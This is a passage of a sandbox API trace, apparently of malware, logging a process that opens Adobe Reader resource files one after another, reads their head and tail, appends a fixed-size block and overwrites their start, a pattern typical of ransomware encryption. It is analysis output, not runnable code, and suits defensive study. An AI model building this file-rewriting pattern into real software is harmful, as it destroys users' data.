lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.460] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.460] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.460] CloseHandle (hObject=0x1f8) returned 1 [0092.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0092.464] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.464] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6ef0 [0092.464] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.464] ReleaseMutex (hMutex=0x168) returned 1 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sl_SI.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sl_SI.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sl_SI.txt", lpUsedDefaultChar=0x0) returned 30 [0092.465] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.467] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ef0 [0092.467] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.470] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ef0 [0092.470] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea88b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.471] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.471] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.471] CloseHandle (hObject=0x1f0) returned 1 [0092.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0092.472] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.472] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6068 [0092.473] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.473] ReleaseMutex (hMutex=0x168) returned 1 [0092.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_CN.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0092.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_CN.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.zh_CN.txt", lpUsedDefaultChar=0x0) returned 30 [0092.473] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.561] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5068 [0095.565] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.575] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5068 [0095.579] WriteFile (in: hFile=0x1f0, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.582] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0095.586] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0095.591] CloseHandle (hObject=0x1f0) returned 1 [0095.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.323] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0097.323] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2d1d2 [0097.323] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0097.323] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.323] ReleaseMutex (hMutex=0x168) returned 1 [0097.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt04.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt04.hsp", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brt04.hsp", lpUsedDefaultChar=0x0) returned 9 [0097.324] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0097.654] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c1d2 [0097.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.695] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c1d2 [0097.695] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.696] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0097.696] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0097.696] CloseHandle (hObject=0x1cc) returned 1 [0097.696] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0098.237] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.237] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x72000 [0098.246] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.247] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.247] ReleaseMutex (hMutex=0x168) returned 1 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul120.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul120.lex", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bul120.lex", lpUsedDefaultChar=0x0) returned 10 [0098.260] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0098.265] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x71000 [0098.265] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.269] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x71000 [0098.269] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.270] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0098.270] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0098.270] CloseHandle (hObject=0x1fc) returned 1 [0098.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0098.272] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.272] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6f4 [0098.272] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.272] ReleaseMutex (hMutex=0x168) returned 1 [0098.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0098.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfr.fca", lpUsedDefaultChar=0x0) returned 7 [0098.273] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x6f4, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x311f2bc*=0x6f4, lpOverlapped=0x0) returned 1 [0098.275] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0098.275] WriteFile (in: hFile=0x1fc, lpBuffer=0x288be18*, nNumberOfBytesToWrite=0xc7c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288be18*, lpNumberOfBytesWritten=0x311f2d0*=0xc7c, lpOverlapped=0x0) returned 1 [0098.275] CloseHandle (hObject=0x1fc) returned 1 [0098.275] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0098.277] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.277] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7fff [0098.277] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.278] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.278] ReleaseMutex (hMutex=0x168) returned 1 [0098.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl32.clx", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ctl32.clx", lpUsedDefaultChar=0x0) returned 9 [0098.278] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.280] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fff [0098.280] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.281] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fff [0098.281] WriteFile (in: hFile=0x1fc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.282] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0098.282] WriteFile (in: hFile=0x1fc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.283] CloseHandle (hObject=0x1fc) returned 1 [0098.283] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0098.285] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.285] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5a800 [0098.285] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.286] ReleaseMutex (hMutex=0x168) returned 1 [0098.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan94.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan94.ths", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dan94.ths", lpUsedDefaultChar=0x0) returned 9 [0098.286] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0098.288] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x59800 [0098.289] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.290] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x59800 [0098.291] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.291] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0098.291] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0098.292] CloseHandle (hObject=0x1fc) returned 1 [0098.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0098.293] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.293] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7fe5 [0098.293] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0098.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.293] ReleaseMutex (hMutex=0x168) returned 1 [0098.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eng32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eng32.clx", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eng32.clx", lpUsedDefaultChar=0x0) returned 9 [0098.294] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.296] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fe5 [0098.296] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.297] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fe5 [0098.297] WriteFile (in: 